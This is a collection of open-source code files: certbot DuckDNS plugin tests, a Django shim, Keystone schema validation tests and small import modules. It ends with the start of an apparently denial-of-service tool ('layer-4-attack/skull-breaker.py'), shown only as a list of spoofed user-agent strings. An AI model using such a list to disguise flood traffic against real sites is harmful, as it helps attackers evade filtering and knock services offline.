                                 DUCKDNS_TOKEN,
                                 "--dns-duckdns-propagation-seconds",
                                 "60",
                                 "--dry-run",
                                 "-d",
                                 DOMAIN,
                                 # change the output dirs to allow running test without root permission
                                 "--work-dir",
                                 "test_certbot/config",
                                 "--config-dir",
                                 "test_certbot/config",
                                 "--logs-dir",
                                 "test_certbot/logs"])

    def test_wildcard_certificate(self):
        assert DOMAIN is not None and len(DOMAIN) > 0 and DOMAIN[0] not in [".", "*"]
        assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0

        wildcard_domain = "*.{}".format(DOMAIN)

        # check if certbot is installed
        subprocess.check_output(["certbot", "--version"])
        # install certbot_dns_duckdns plugin
        subprocess.check_output(["pip", "install", ".."])
        # check if certbot works properly with the dns plugin
        subprocess.check_output(["certbot",
                                 "certonly",
                                 "--non-interactive",
                                 "--agree-tos",
                                 "--register-unsafely-without-email",
                                 "--authenticator",
                                 "dns-duckdns",
                                 "--dns-duckdns-token",
                                 DUCKDNS_TOKEN,
                                 "--dns-duckdns-propagation-seconds",
                                 "60",
                                 "--dry-run",
                                 "-d",
                                 wildcard_domain,
                                 # change the output dirs to allow running test without root permission
                                 "--work-dir",
                                 "test_certbot/config",
                                 "--config-dir",
                                 "test_certbot/config",
                                 "--logs-dir",
                                 "test_certbot/logs"])


if __name__ == "__main__":
    unittest.main()
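The bare asserts above make a missing TEST_DOMAIN or TEST_DUCKDNS_TOKEN surface as a test *failure*. A minimal sketch of an alternative using `unittest.skipUnless`, which reports unset credentials as a skip instead; `GuardedTests` and `TOKEN` are hypothetical placeholders, not part of the plugin's test suite:

```python
import io
import unittest

TOKEN = None  # simulate an unset TEST_DUCKDNS_TOKEN

# skipUnless marks the whole class as skipped when the condition is falsy,
# so missing credentials do not count against the pass/fail tally.
@unittest.skipUnless(TOKEN, "credentials not configured")
class GuardedTests(unittest.TestCase):
    def test_uses_token(self):
        self.assertTrue(TOKEN)

result = unittest.TextTestRunner(stream=io.StringIO()).run(
    unittest.defaultTestLoader.loadTestsFromTestCase(GuardedTests))
print(result.testsRun, len(result.skipped))
```

With `TOKEN` unset, the single test is collected but recorded in `result.skipped` rather than in failures.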

# django/forms/util.py (pomarec/django, BSD-3-Clause)

import warnings
warnings.warn(
    "The django.forms.util module has been renamed. "
    "Use django.forms.utils instead.", PendingDeprecationWarning)

from django.forms.utils import *
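The shim above warns at import time and then re-exports everything from the renamed module. The same rename pattern can be sketched at function level, with the warning verified via `warnings.catch_warnings`; `old_api` and `new_api` are hypothetical names, not Django APIs:

```python
import warnings

def new_api():
    return "ok"

def old_api():
    # Shim: warn callers, then forward to the renamed function -- the same
    # pattern django.forms.util applies at module level above.
    warnings.warn("old_api has been renamed; use new_api instead.",
                  PendingDeprecationWarning)
    return new_api()

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")  # ensure the warning is not suppressed
    value = old_api()

print(value, len(caught), caught[0].category.__name__)
```

`PendingDeprecationWarning` is the conventional first stage of a removal cycle; a later release typically upgrades it to `DeprecationWarning` before the old name is dropped.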

# keystone/tests/unit/test_v2_validation.py (andy-ning/stx-keystone, Apache-2.0)

# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from keystone.assignment import schema as assignment_schema
from keystone.catalog import schema as catalog_schema
from keystone.common.validation import validators
from keystone import exception
from keystone.identity import schema as identity_schema
from keystone.resource import schema as resource_schema
from keystone.tests import unit
_INVALID_NAMES = [True, 24, ' ', '']
_VALID_ENABLED_FORMATS = [True, False]
_INVALID_ENABLED_FORMATS = ['some string', 1, 0, 'True', 'False']
class RoleValidationTestCase(unit.BaseTestCase):
"""Test for V2 Roles API Validation."""
def setUp(self):
super(RoleValidationTestCase, self).setUp()
schema_role_create = assignment_schema.role_create_v2
self.create_validator = validators.SchemaValidator(schema_role_create)
def test_validate_role_create_succeeds(self):
request = {
'name': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_role_create_succeeds_with_spaces_in_description(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Description with spaces'
}
self.create_validator.validate(request)
def test_validate_role_create_succeeds_with_extra_params(self):
request = {
'name': uuid.uuid4().hex,
'asdf': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_role_create_fails_with_invalid_params(self):
request = {
'bogus': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_role_create_fails_with_no_params(self):
request = {}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_role_create_fails_with_invalid_name(self):
"""Exception when validating a create request with invalid `name`."""
for invalid_name in _INVALID_NAMES:
request_to_validate = {'name': invalid_name}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request_to_validate)
class TenantValidationTestCase(unit.BaseTestCase):
"""Test for v2 Tenant API Validation."""
def setUp(self):
super(TenantValidationTestCase, self).setUp()
schema_tenant_create = resource_schema.tenant_create
schema_tenant_update = resource_schema.tenant_update
self.create_validator = validators.SchemaValidator(
schema_tenant_create)
self.update_validator = validators.SchemaValidator(
schema_tenant_update)
def test_validate_tenant_create_success(self):
request = {
'name': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_tenant_create_success_with_empty_description(self):
request = {
'name': uuid.uuid4().hex,
'description': ''
}
self.create_validator.validate(request)
def test_validate_tenant_create_success_with_extra_parameters(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True,
'extra': 'test'
}
self.create_validator.validate(request)
def test_validate_tenant_create_failure_with_missing_name(self):
request = {
'description': 'Test tenant',
'enabled': True
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_fails_with_invalid_name(self):
"""Exception when validating a create request with invalid `name`."""
for invalid_name in _INVALID_NAMES:
request = {'name': invalid_name}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_failure_with_empty_request(self):
request = {}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_failure_with_is_domain(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True,
'is_domain': False
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.create_validator.validate(request)
def test_validate_tenant_create_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_update_success(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True
}
self.update_validator.validate(request)
def test_validate_tenant_update_success_with_optional_ids(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True,
'tenantId': uuid.uuid4().hex,
'id': uuid.uuid4().hex
}
self.update_validator.validate(request)
def test_validate_tenant_update_with_domain_id(self):
request = {
'name': uuid.uuid4().hex,
'domain_id': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_with_is_domain(self):
request = {
'name': uuid.uuid4().hex,
'is_domain': False
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_with_empty_request(self):
request = {}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_fails_with_invalid_name(self):
"""Exception when validating an update request with invalid `name`."""
for invalid_name in _INVALID_NAMES:
request = {'name': invalid_name}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.update_validator.validate(request)
def test_validate_tenant_update_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
class ServiceValidationTestCase(unit.BaseTestCase):
"""Test for V2 Service API Validation."""
def setUp(self):
super(ServiceValidationTestCase, self).setUp()
schema_create = catalog_schema.service_create
self.create_validator = validators.SchemaValidator(schema_create)
def test_validate_service_create_succeeds(self):
request = {
'name': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'description': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_service_create_fails_with_invalid_params(self):
request = {
'bogus': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_fails_with_invalid_name(self):
for invalid_name in _INVALID_NAMES:
request = {
'type': uuid.uuid4().hex,
'name': invalid_name
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'type': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.create_validator.validate(request)
def test_validate_service_create_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'type': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_with_invalid_type(self):
request = {
'type': -42
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_with_type_too_large(self):
request = {
'type': 'a' * 256
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
class UserValidationTestCase(unit.BaseTestCase):
"""Test for V2 User API Validation."""
def setUp(self):
super(UserValidationTestCase, self).setUp()
schema_user_create = identity_schema.user_create_v2
schema_user_update = identity_schema.user_update_v2
self.create_validator = validators.SchemaValidator(schema_user_create)
self.update_validator = validators.SchemaValidator(schema_user_update)
def test_validate_user_create_succeeds_with_name(self):
request = {
'name': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_user_create_succeeds_with_username(self):
request = {
'username': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_user_create_fails_with_invalid_params(self):
request = {
'bogus': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_user_create_fails_with_invalid_name(self):
for invalid_name in _INVALID_NAMES:
request = {
'name': invalid_name
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_user_create_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.create_validator.validate(request)
def test_validate_user_create_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_user_update_succeeds_with_name(self):
request = {
'name': uuid.uuid4().hex,
'enabled': True
}
self.update_validator.validate(request)
def test_validate_user_update_succeeds_with_username(self):
request = {
'username': uuid.uuid4().hex,
'enabled': True
}
self.update_validator.validate(request)
def test_validate_user_update_succeeds_with_no_params(self):
request = {}
self.update_validator.validate(request)
def test_validate_user_update_fails_with_invalid_name(self):
for invalid_name in _INVALID_NAMES:
request = {
'name': invalid_name
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_user_update_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.update_validator.validate(request)
def test_validate_user_update_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
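The tests above treat `validators.SchemaValidator` as a black box. A stdlib-only sketch of the kind of checks it performs for the tenant_create schema; `validate_tenant_create` is a hypothetical simplification for illustration, not keystone's jsonschema-backed implementation:

```python
class SchemaValidationError(Exception):
    pass

def validate_tenant_create(request):
    # Simplified rules matching the cases exercised above: a required,
    # non-empty string 'name' and an optional strictly-boolean 'enabled'
    # (so 'True', 1, and 0 are all rejected).
    name = request.get('name')
    if not isinstance(name, str) or not name.strip():
        raise SchemaValidationError("'name' must be a non-empty string")
    if 'enabled' in request and not isinstance(request['enabled'], bool):
        raise SchemaValidationError("'enabled' must be a boolean")

validate_tenant_create({'name': 'demo', 'enabled': True})  # accepted

rejected = 0
for bad in ({'name': ''}, {'name': 24}, {'name': ' '},
            {'name': 'x', 'enabled': 'True'}):
    try:
        validate_tenant_create(bad)
    except SchemaValidationError:
        rejected += 1
print(rejected)
```

The invalid samples mirror `_INVALID_NAMES` and `_INVALID_ENABLED_FORMATS` at the top of the test module, which is why string-typed booleans such as `'True'` must fail validation.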

# dfvfs/credentials/__init__.py (dfjxs/dfvfs, Apache-2.0)

# -*- coding: utf-8 -*-
"""Imports for the credential manager."""
from dfvfs.credentials import apfs_credentials
from dfvfs.credentials import bde_credentials
from dfvfs.credentials import encrypted_stream_credentials
from dfvfs.credentials import fvde_credentials
from dfvfs.credentials import luksde_credentials
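These imports exist for their side effects: each credentials module registers a class with the credential manager when the package is imported. A minimal sketch of that import-for-registration pattern; `CredentialsManager` and `BDECredentials` here are hypothetical stand-ins, not the real dfvfs classes:

```python
class CredentialsManager(object):
    """Toy registry keyed by a type indicator string."""
    _credentials = {}

    @classmethod
    def RegisterCredentials(cls, credentials):
        cls._credentials[credentials.TYPE_INDICATOR] = credentials

class BDECredentials(object):
    TYPE_INDICATOR = 'BDE'

# In the real package this call sits at module level inside the
# credentials module, so importing the module is enough to register it.
CredentialsManager.RegisterCredentials(BDECredentials)

print(sorted(CredentialsManager._credentials))
```

Listing the modules in `__init__.py`, as above, guarantees every credentials type is registered as soon as `dfvfs.credentials` is imported.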

# pc_processor/postproc/__init__.py (MasterHow/PanoLiSeg, MIT)

from .knn import KNN

# layer-4-attack/skull-breaker.py (ChaoSoldier3000/Dos, Apache-2.0)

ua = [
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1", "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","AppleTV5,3/9.1.1","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Dalvik/2.1.0 (Linux; U; Android 6.0.1; Nexus Player Build/MMB29T)","Chrome 19.0.1084.9 (64 bit)" ,
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2","Chrome 20.0.1132.57 (CrOS)" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", "Links/0.9.1 (Linux 2.4.24; i386;)", "ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)" , "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", "Mozilla/2.02E (Win95; U)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0)" ,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2" , "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko","Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", "w3m/0.5.1" , "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393","Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US","Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586","Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.EU",
"Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14",
"Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15",
"Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14",
"Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1b2) Gecko/20060901 Firefox/2.0b2",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.10pre) Gecko/20080112 SeaMonkey/1.1.7pre",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.14) Gecko/20080429 BonEcho/2.0.0.14",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.18) Gecko/20081114 BonEcho/2.0.0.18",
"Mozilla/5.0 (BeOS; U; Haiku BePC; en-US; rv:1.8.1.21pre) Gecko/20090218 BonEcho/2.0.0.21pre",
"Mozilla/5.0 (Darwin; FreeBSD 5.6; en-GB; rv:1.8.1.17pre) Gecko/20080716 K-Meleon/1.5.0",
"Mozilla/5.0 (Darwin; FreeBSD 5.6; en-GB; rv:1.9.1b3pre)Gecko/20081211 K-Meleon/1.5.2",
"Mozilla/5.0 (Future Star Technologies Corp.; Star-Blade OS; x86_64; U; en-US) iNet Browser 4.7",
"Mozilla/5.0 (Linux 2.4.18-18.7.x i686; U) Opera 6.03 [en]",
"Mozilla/5.0 (Linux 2.4.18-ltsp-1 i686; U) Opera 6.1 [en]",
"Mozilla/5.0 (Linux 2.4.19-16mdk i686; U) Opera 6.11 [en]",
"Mozilla/5.0 (Linux 2.4.21-0.13mdk i686; U) Opera 7.11 [en]",
